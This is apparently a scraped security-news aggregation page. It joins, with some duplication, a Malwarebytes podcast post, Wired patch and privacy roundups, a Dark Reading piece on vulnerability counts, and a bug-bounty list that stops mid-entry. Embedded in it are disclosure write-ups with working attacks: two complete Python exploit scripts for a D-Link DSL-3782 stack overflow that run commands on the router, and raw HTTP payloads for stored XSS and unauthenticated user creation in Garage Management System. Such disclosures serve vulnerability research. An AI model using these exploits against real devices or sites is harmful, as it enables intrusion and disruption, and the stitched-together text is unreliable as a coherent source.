PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 
The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we’re bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court’s decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google’s all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn’t just because so much of our data is tracked today, but that we currently don’t know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today’s fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

March 7, 2022 - The most important and interesting security stories from the last seven days.

February 28, 2022 - This week on Lock and Code, we discuss Crisis Text Line's data-sharing agreement with its for-profit partner, which has upset many people.

Have we lost the fight for data privacy? Lock and Code S03E16

Categories: Podcast
Tags: Data privacy

Tags: facebook

Tags: Google

Tags: lock and code

Tags: lock and code podcast

Tags: malwarebytes labs

Tags: podcast

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 



(Read more...)




The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we're bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court's decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google's all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn't just because so much of our data is tracked today, but that we currently don't know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today's fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

July has been a month of important updates, including patches for already-exploited vulnerabilities in Microsoft and Google products. This month also saw the first Apple iOS update in eight weeks, fixing dozens of security flaws in iPhones and iPads.

Security vulnerabilities continue to hit enterprise products, too, with July patches issued for SAP, Cisco, and Oracle software. Here’s what you need to know about the vulnerabilities fixed in July.

Apple iOS 15.6

Apple has released iOS and iPadOS 15.6 to fix 37 security flaws, including an issue in Apple File System (APFS) tracked as CVE-2022-32832. If exploited, the vulnerability could allow an app to execute code with kernel privileges, according to Apple’s support page, giving it deep access to your device.

Other iOS 15.6 patches fix vulnerabilities in the kernel and WebKit browser engine, as well as flaws in IOMobileFrameBuffer, Audio, iCloud Photo Library, ImageIO, Apple Neural Engine, and GPU Drivers.

Apple isn’t aware of any of the patched flaws being used in attacks, but some of the vulnerabilities are pretty serious—especially those affecting the kernel at the heart of the operating system. It’s also possible for vulnerabilities to be chained together in attacks, so make sure you update as soon as possible.

The iOS 15.6 patches were released alongside watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, macOS Big Sur 11.6.8, and macOS Catalina 10.15.7 2022-005.

Google Chrome

Google released an emergency patch for its Chrome browser in July, fixing four issues, including a zero-day flaw that has already been exploited. Tracked as CVE-2022-2294 and reported by Avast Threat Intelligence researchers, the memory corruption vulnerability in WebRTC was abused to achieve shellcode execution in Chrome’s renderer process.

The flaw was used in targeted attacks against Avast users in the Middle East, including journalists in Lebanon, to deliver spyware called DevilsTongue.

Based on the malware and tactics used to carry out the attack, Avast attributes the use of the Chrome zero-day to Candiru, an Israel-based company that sells spyware to governments.

Microsoft’s Patch Tuesday

Microsoft’s July Patch Tuesday is a big one, fixing 84 security issues including a flaw already being used in real-world attacks. The vulnerability, CVE-2022-22047, is a local privilege escalation flaw in the Windows Client/Server Runtime Subsystem (CSRSS) server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. An attacker able to successfully exploit the vulnerability could gain System privileges, according to Microsoft.

Of the 84 issues patched in Microsoft’s July Patch Tuesday, 52 were privilege escalation flaws, four were security feature bypass vulnerabilities, and 12 were remote code execution issues.

Microsoft security patches do sometimes cause other issues, and the July update was no different: Following the release, some users found MS Access runtime applications did not open. Thankfully, the firm is rolling out a fix.

Android July Security Bulletin

Google has released July updates for its Android operating system, including a fix for a critical security vulnerability in the System component that could lead to remote code execution with no additional privileges needed.

Google also fixed serious issues in the kernel–which could result in information disclosure—and the framework, which could lead to local privilege escalation. Meanwhile, vendor-specific patches from MediaTek, Qualcomm, and Unisoc are available if your device is using those chips. Samsung devices are starting to receive the July patch, and Google also released updates for its Pixel range.

SAP

Software maker SAP has issued 27 new and updated security notes as part of its July Security Patch Day, fixing multiple high-severity vulnerabilities. Tracked as CVE-2022-35228, the most serious issue is an information disclosure flaw in the central management console of the vendor’s Business Objects platform.

The vulnerability allows an unauthenticated attacker to gain token information over the network, according to security firm Onapsis. “Fortunately, an attack like this would require a legitimate user to access the application,” the firm adds. However, it’s still important to patch as soon as possible.

Oracle

Oracle has issued 349 patches in its July 2022 Critical Patch Update, including fixes for 230 flaws that can be exploited remotely.

Oracle’s April Patch Update included 520 security fixes, some of which addressed CVE-2022-22965, aka Spring4Shell, a remote code execution flaw in the spring framework. Oracle’s July update continues to address this issue.

Apple Just Patched 37 iPhone Security Bugs

Plus: Google delays the end of cookies (again), EU officials were targeted with Pegasus spyware, and more of the top security news.

Russia’s full-scale invasion of Ukraine has been ongoing for more than 150 days, with no end to the conflict in sight. While Ukrainian troops are having some success with counteroffensives in the south of the country, the war is having long-lasting impacts on freedom of speech and online censorship.

This week, we documented how a flurry of more than half a dozen new Russian laws, all proposed or passed in recent months, will help to separate Russia from the global internet. The move, if successful, could damage the very idea of the free and open internet and have global ramifications. But it is not all bad news. Russia’s attempts to block and censor people’s online lives are hitting some stumbling blocks: Its long-held ambition to block anonymity service Tor is faltering.

Last month, Joe Biden signed the Bipartisan Safer Communities Act, the first major federal gun law passed in years. However, senators lacked any real government data on gun violence when they were drafting the law, in part because, until 2019, the Centers for Disease Control and Prevention was banned for decades from studying gun violence in America. As a result, much of the data used to inform the Act came from elsewhere. We also looked at whether states could legally block people seeking abortions from crossing state lines to do so following the fall of _Roe v. Wade_.

Elsewhere, we’ve also put together a guide to how you can safely lend your phone to someone else, whether to a friend who wants to look at your holiday photos or a stranger who needs to make an emergency phone call. A few simple tweaks to your iPhone or Android settings can quickly help to secure your data.

And there’s more. Each week we round up the news that we didn’t break or cover in depth. Click on the headlines to read the full stories. And stay safe out there!

Every year, the list of companies getting hacked or suffering data breaches continues to grow. These incidents are often the result of businesses’ technical misconfigurations or poor security practices. While each incident is different, it is undeniable that data breaches can have huge impacts on those impacted: individuals who have their data leaked, for example, and companies who have to deal with reputation and financial damage. This week, an IBM report revealed that the cost of a data breach in 2022 has reached an “all-time high,” averaging $4.35 million. That’s a 2.6 percent increase from last year.

Perhaps more salient, according to IBM’s data, is that companies are hitting their customers with the costs of data breaches. The company surveyed 550 organizations that had suffered a data breach between March 2021 and March 2022, and 60 percent of them said they had increased their prices as a result of the breach. No specific examples were given in the report. And it’s unclear whether companies passing on the costs of cybersecurity incidents are investing that extra income into better protecting their customer’s data in the future. However, according to IBM, only 17 percent of the 550 companies surveyed said it was the first data breach they had suffered.

Another week, another set of spyware bombshells. This week Reuters revealed that the European Union found evidence that phones belonging to its staff were targeted with Pegasus, the powerful hacking tool of Israeli firm NSO Group. EU Justice Commissioner Didier Reynders was apparently told by Apple that his iPhone may have been hacked in 2021. An ongoing EU investigation, according to Reuters, found indicators of compromise on some devices. It follows officials announcing that 14 EU member states have purchased Pegasus in the past.

That was not the only spyware revelation this week. The leader of Greece’s opposition political party launched a complaint alleging his phone had been targeted with Israeli-made Predator spyware, developed by Cytrox. Microsoft also linked spyware, dubbed Subzero, to European firm DSIRF. The details, published to coincide with a spyware hearing of the House Intelligence Committee, claimed Subzero had been used to target banks and consultancy firms in Austria, the UK, and Panama.

If technology companies want to operate in China and sell their products to a market of more than a billion people, they’re going to have to bend to the rules. Firms are required to store data locally and, as Apple learned, may have to compromise the security protections they put in place around people’s data. As the video game _Roblox_ prepared to launch in China in 2017 and 2018, its developer was well aware of the potential consequences.

According to _Roblox_ documents obtained by VICE, the company believed it could be hacked if it entered China and that rivals would create their own version of its game. “Expect that hacking has already started,” an internal presentation in 2017 said. The documents also show how _Roblox_ applied Chinese censorship laws—“illegal content” included tampering with historical facts and misrepresenting Chinese territories on maps—and other local laws, such as collecting players’ real names. _Roblox_ eventually launched its Chinese app LuoBuLesi in July 2021, but shut it down at the start of this year.

For years, Apple’s Safari and Mozilla’s Firefox browsers have limited how third-party cookies can track you across the web. These small snippets of code, which are saved to your device when you visit websites, are able to track your browsing history and show you ads based on what you’ve seen. They’re widely considered a privacy nightmare. So when Google announced, in January 2020, that Chrome would finally ditch creepy third-party cookies by 2022, the move was a big deal. However, in practice, Google has struggled to make the change. This week, Google announced its plan has been delayed for a second time. Third-party cookies have been given a stay of execution until at least the backend of 2024, when they will start to be phased out. So far, Google’s efforts to replace third-party cookies have been turbulent, with privacy advocates claiming the replacements are worse than cookies, and the advertising industry saying they’ll decrease competition.

You Pay More When Companies Get Hacked

D-Link DSL-3782 v1.03 and below was discovered to contain a stack overflow via the function getAttrValue.

Vendor of the products:　D-Link

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　DSL-3782 v1.01, DSL-3782 v1.03

**Buffer overflow****Code in cfg\_manager**

Code bellow (in cfg\_manager) performs the traceroute (or ping) test in the Diagnostic webpage.

The _getAttrValue_ method at .text: 0x474bA4 can lead to a stack-based buffer overflow.

**Code in getAttrValue**

The dst parameter (a4) of strcpy corresponds to the $a3 register in the above picture, which comes from the $s1 register, and the $s1 register stores an offset address in stack (at .text: 474af0).

**In v1.01****exp**

import requests
import urllib
from pwn import \*

context.binary \= "../\_DSL-3782\_A1\_EU\_1.01\_07282016.bin.extracted/squashfs-root/userfs/bin/cfg\_manager"
context.endian \= "big"
context.arch \= "mips"

main\_url \= "http://192.168.1.1:80"

def login():
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        }
    url \= main\_url + "/cgi-bin/Login.asp?User=admin&Pwd=admin&\_=1640832458081"
    resp \= s.get(url,headers\=headers,timeout\=10)
    print resp.text

def get\_session\_key():
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        }
    url \= main\_url + "/cgi-bin/get/New\_GUI/get\_sessionKey.asp"
    resp \= s.get(url,headers\=headers,timeout\=10)
    sessionKey \= resp.text
    return sessionKey

def exp(sessionKey\=None):
    libc\_base \= 0x2b50b000
    system\_offset \= 0x59bb0
    system\_addr \= libc\_base + system\_offset
    gadget\_offset \= 0x0001656C
    gadget\_addr \= libc\_base + gadget\_offset

    cmd \= "echo yab. > /tmp/1"
    padding \= "a" \* 72
    s0 \= p32(system\_addr)
    s1 \= "AAAA"
    s2 \= "BBBB" 
    s3 \= "CCCC"
    ra \= p32(gadget\_addr)
    padding2 \= "A" \* 16
    payload \= padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd

    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
        }
    params \= {
        "Type":"p", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
        }
    url \= main\_url + "/cgi-bin/New\_GUI/Set/Diagnostics.asp"
    resp \= s.post(url,data\=params,headers\=headers,timeout\=10)
    print resp.text

if \_\_name\_\_ \== '\_\_main\_\_':
    login()
    sessionKey \= get\_session\_key()
    exp(sessionKey\=sessionKey) 

**Attack effect**

Since the command we executed in the exploit script (line 41) is echo yab. > /tmp/1, we can confirm that our attack was successful by printing the content in file /tmp/1.

**In v1.03**

An authenticated attacker can still use the stack-based bof to complete remote code execution of single-word commands (such as reboot).

**exp**

import requests
import urllib
from pwn import \*
import os
from time import sleep

context.binary \= "../new/\_DSL-3782\_A1\_EU\_1.03\_04042018.bin.extracted/squashfs-root/userfs/bin/cfg\_manager"
context.endian \= "big"
context.arch \= "mips"

server \= "192.168.1.1"
main\_url \= "http://192.168.1.1:80"

def get\_session\_key(a):
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie": "SESSIONID\_AUTH=%s" % a
        }
    url \= main\_url + "/cgi-bin/get/New\_GUI/get\_sessionKey.asp"
    resp \= s.get(url,headers\=headers,timeout\=10)
    sessionKey \= resp.text
    print(sessionKey)
    return sessionKey

def exp(sessionKey\=None,a\=''):
    libc\_base \= input('libc\_base:')
    system\_offset \= 0x59bb0
    system\_addr \= libc\_base + system\_offset
    gadget\_offset \= 0x0001656C
    gadget\_addr \= libc\_base + gadget\_offset

    cmd \= "reboot"
    padding \= "a" \* 72
    s0 \= p32(system\_addr)
    s1 \= "AAAA"
    s2 \= "BBBB" 
    s3 \= "CCCC"
    ra \= p32(gadget\_addr)
    padding2 \= "A" \* 16
    payload \= padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd

    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie": "SESSIONID\_AUTH=%s" % a
        }
    params \= {
        "Type":"t", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
        }
    url \= main\_url + "/cgi-bin/New\_GUI/Set/Diagnostics.asp"
    resp \= s.post(url,data\=params,headers\=headers,timeout\=10)
    print resp.text

if \_\_name\_\_ \== '\_\_main\_\_':
    print '\\n\[\*\] Connection %r' % main\_url
    a \= input()
    print '\[\*\] Getting session key'
    sessionKey \= get\_session\_key(a)
    print '\[\*\] Sending payload'
    exp(sessionKey\=sessionKey, a\=a) 
    sleep(1)
    print '\[\*\] Rebooting the target!'
    sleep(2)
    print '\[\*\] Done!'

**Attack effect**

Since the command we executed in the exploit script (line 37) is reboot , you can see that the emulator (firmadyne) is rebooting.

CVE-2022-34528: Vuls/BOF_in_D-Link DSL-3782.md at main · 1160300418/Vuls

The first half of the year saw more than 11,800 reported security vulnerabilities, but figuring out which ones to patch first remains a thankless job for IT teams.

The number of vulnerabilities disclosed in the first half of the year topped 11,800, forcing companies to determine the impact of an average of 90 security issues per weekday.

The numbers are from cybersecurity firm Flashpoint's "The State of Vulnerability Intelligence — 2022 Midyear Edition" report, which notes that the massive number of vulnerabilities reported in the first half of the year highlights the problems facing companies as they try to triage software security issues and determine which software updates to prioritize. 

Without better guidance, organizations attempting to sort through the security issues struggle to separate those that are highly critical from minor vulnerabilities and those that may not affect their environment at all, says Brian Martin, vice president of vulnerability intelligence at Flashpoint.

"There are some issues that will have no bearing on any real organization in the world — it might be a vulnerability in some Chinese blog that has seven installs worldwide," Martin says. "On the other hand, we do have vulnerabilities in Microsoft products, Google products, Apple products. Stuff that is just as high-profile and concerning as any issue from a Patch Tuesday."  

    

Daily vulnerability volumes in the first half of 2022. Source: Flashpoint

Clouding the issue is the focus put on zero-day vulnerabilities, those labeled as "discovered in the wild" by researchers before a patch is available. These are difficult to collect information on. Google's Project Zero documented 20 such vulnerabilities exploited in the wild in the first half of 2022, while Flashpoint found at least 17 more issues.

Yet the most common attacks usually use known vulnerabilities.

"Discovered-in-the-wild vulnerabilities are often used in high-profile breaches or are attributed to Advanced Persistent Threat (APT) attacks," the report states. "Due to their nature, organizations often lack defensive options for them. However, business leaders need to keep in mind that discovered-in-the-wild vulnerabilities represent a tiny fraction of compromises occurring around the world."

Organizations also had to deal with a growing number of days with hundreds of reported vulnerabilities because of software vendors' regularly scheduled updates. In February, for example, Flashpoint documented 351 issues thanks to releases from Microsoft's Patch Tuesday and disclosures from other software vendors falling on the same day. In April, a similar convergence of software-vulnerability disclosures saw the highest number of vulnerabilities, 356, released in a single day.

"Organizations need to be aware that the vulnerability disclosure landscape is highly volatile, with 'standard' days potentially introducing volumes traditionally seen only on Patch Tuesdays and other similar events," the Flashpoint report states.  

**Snowballing Levels of Vulnerability Disclosures**

The report also shows that the number of vulnerabilities disclosed to vendors continues to remain at high levels.

The National Vulnerability Database (NVD) also documented more than 11,000 flaws assigned Common Vulnerability and Exposures (CVE) identifiers in the first six months of the year. However, a fraction of those are not true reported vulnerabilities but vendors reserving CVE identifiers for future, or yet-to-be disclosed, vulnerabilities. Flashpoint estimates that its database has details on 27% more vulnerabilities than documented in the NVD.  

While various distributions of Linux topped the chart of vulnerable applications — such as SUSE, openSUSE Leap, and Ubuntu — open source–focused companies accounted for only four of the 10 vendors with the highest vulnerability counts in the first half of 2022. Yet high counts are not necessarily a sign of insecurity but are often a sign that the software company has a process in place to detect and remediate issues.

"There are many underlying reasons as to why certain products and vendors tend to have high vulnerability counts, such as overall market share, product-specific market share, routine — or lack of — schedule of disclosures, attention from vulnerability researchers, and vendor response/patch time, among others," the Flashpoint report states. "Therefore, organizations should not be immediately concerned about well-known vendors having 'more' vulnerabilities, as it could be a sign that they are actively disclosing and patching issues."

Security Teams Overwhelmed With Bugs, Bitten by Patch Prioritization

A vulnerability, which was classified as problematic, was found in SourceCodester Garage Management System 1.0. Affected is an unknown function of the file /php_action/createUser.php. The manipulation of the argument userName with the input lala<img src="" onerror=alert(1)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Permalink

**Garage Management System - user\_info 'userName' Stored Cross-Site Scripting(XSS)****Exploit Title: Garage Management System - user\_info 'userName' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Software Link:https://www.sourcecodester.com/download-code?nid=15485&title=Garage+Management+System+using+PHP%2FMySQL+Free+Source+Code****Version: Garage Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Garage Management System does not filter the content correctly at the "userName" parameter, resulting in the generation of stored XSS.

**Payload used:**

    POST /php_action/createUser.php HTTP/1.1
    Host: 192.168.67.9
    Content-Length: 565
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.67.9
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUD1Yb96WGEg9mpcD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.67.9/add-user.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PHPSESSID=sv8b900m4au6g31guodelu6tc9
    Connection: close
    
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="currnt_date"
    
    
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="userName"
    
    lala<img src="" onerror=alert(1)>
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="upassword"
    
    123
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="uemail"
    
    123@qq.com
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD--
    
    
    

**Proof of Concept**

1.  Send payload
    
2.  Open Page http://192.168.67.9/users.php，We can see the alert.

CVE-2022-2579: vul/Garage Management System(XSS).md at main · ch0ing/vul

A vulnerability, which was classified as critical, has been found in SourceCodester Garage Management System 1.0. This issue affects some unknown processing of the file /php_action/createUser.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

Permalink

Cannot retrieve contributors at this time

**Garage Management System - create new user Unauthorized****Exploit Title: Garage Management System - create new user Unauthorized****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Software Link:https://www.sourcecodester.com/download-code?nid=15485&title=Garage+Management+System+using+PHP%2FMySQL+Free+Source+Code****Version: Garage Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Confirmation of the user's identity, authentication, and session management is critical to protect against authentication-related attacks.

**Payload used:**

    POST /php_action/createUser.php HTTP/1.1
    Host: 192.168.67.9
    Content-Length: 548
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.67.9
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfyEJMTq3SaowAIJ3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.67.9/add-user.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    
    ------WebKitFormBoundaryfyEJMTq3SaowAIJ3
    Content-Disposition: form-data; name="currnt_date"
    
    
    ------WebKitFormBoundaryfyEJMTq3SaowAIJ3
    Content-Disposition: form-data; name="userName"
    
    123@qq.com
    ------WebKitFormBoundaryfyEJMTq3SaowAIJ3
    Content-Disposition: form-data; name="upassword"
    
    admin@123
    ------WebKitFormBoundaryfyEJMTq3SaowAIJ3
    Content-Disposition: form-data; name="uemail"
    
    123@qq.com
    ------WebKitFormBoundaryfyEJMTq3SaowAIJ3
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryfyEJMTq3SaowAIJ3--
    
    
    
    

**Proof of Concept**

1.  Send payload
    
2.  Open Page http://192.168.67.9/users.php，See one more user added.
    
3.  123@qq.com/admin@123 can login system;

CVE-2022-2578: vul/Garage Management System--.md at main · ch0ing/vul

New web targets for the discerning hacker

New web targets for the discerning hacker

Summer is here in the northern hemisphere, but this hasn’t interrupted the steady stream of new bug bounty programs from hitting the market.

During the teaser for its new Lockdown Mode this month, **Apple** said vulnerabilities in the new anti-spyware tech can be disclosed via its Security Bounty program. Rewards of up to $2 million are on offer.

Lockdown Mode, which will ship with iOS 16, iPadOS 16, and macOS Ventura, is described as “an extreme, optional protection for the very small number of users who face grave, targeted threats to their digital security”.

Australia’s **Monash University** has also established a new bug bounty program, which is aimed at shoring up its defenses amid a spate of cyber-attacks impacting the education sector.

Added to the mix this month are two new rewards programs for the burgeoning digital identity market, as **Onfido** partners with YesWeHack and India’s **Aadhaar** dips its toe in the water with a program of its own.

Aadhaar is world’s largest digital identity program that provides services to over 1.3 billion Indian residents. To take part in this new, private bug bounty, hackers must apply via the UIDAI website.

There’s a high bar for entry, too, as Aadhaar stipulates that “candidates should be listed in the top 100 of the bug bounty leaderboards such as HackerOne, Bugcrowd, or listed in the bounty programs conducted by reputable companies such as Microsoft, Google, Facebook, \[or\] Apple”.

**The latest bug bounty programs for August 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Aadhaar**

**Program provider:  
**Independent

**Program type:  
**Private

**Max reward:  
**TBD

**Outline:  
**In an effort to secure Aadhaar data hosted in UIDAI’s Central Identities Data Repository (CIDR), UIDAI is planning the launch of a new bug bounty program.

**Notes:  
**Full application details can be found on the UIDAI website. The number of participants is being limited to 20, all of whom must be Indian residents.

Check out the UIDAI bug bounty bulletin (PDF) for more details

**Apple – Lockdown Mode**

**Program provider:  
**Independent

**Program type:  
**Public

**Max reward:  
**$2 million

**Outline:  
**Apple has established a new category within the Apple Security Bounty program to reward researchers who find Lockdown Mode bypasses and help improve its protections.

**Notes:  
**Bounties have been doubled for qualifying findings in Lockdown Mode, up to a maximum of $2 million – one of the highest maximum payouts in the industry.

Check out our earlier coverage for more details

**BKEX**

**Program provider:  
**HackenProof

**Program type:  
**Public

**Max reward:  
**$10,000

**Outline:  
**BKEX is a global digital asset trading platform, featuring more than 1,200 cryptocurrencies.

**Notes:  
**The financial service company’s new bug bounty program is replete with a range of in-scope web attack vectors, including remote code execution (RCE), SQL injection vulnerabilities, file inclusion and access control issues, server-side request forgery (SSRF), cross-site request forgery (CSRF), cross-site scripting (XSS), and directory traversal.

Check out the BKEX bug bounty page for more details

**ClickHouse**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**ClickHouse is an open source, column-oriented OLAP database management system that allows users to generate analytical reports using SQL queries in real time. The main focus of the public program is the open source version of the ClickHouse platform.

**Notes:  
**“No technology is perfect, and ClickHouse believes that working with skilled security researchers across the globe is crucial in identifying weaknesses in any technology,” the company said. “We are excited for you to participate as a security researcher to help us identify vulnerabilities in our open source assets.”

Check out the ClickHouse bug bounty page for more details

**Monash University**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**Monash University in Melbourne, Australia, has launched a public bug bounty program to help maintain the security of its digital platforms.

**Notes:  
**In-scope targets include the main Monash University web domain and mobile apps, along with various technologies that are used by the institution, including its VPN and FileShare instances.

Check out our earlier coverage for more details

**Onfido**

**Program provider:  
**YesWeHack

**Program type:  
**Private

**Max reward:  
**TBD

**Outline:  
**Digital identity verification company Onfido has launched a new bug bounty program, in partnership with European vulnerability disclosure platform YesWeHack.

**Notes:  
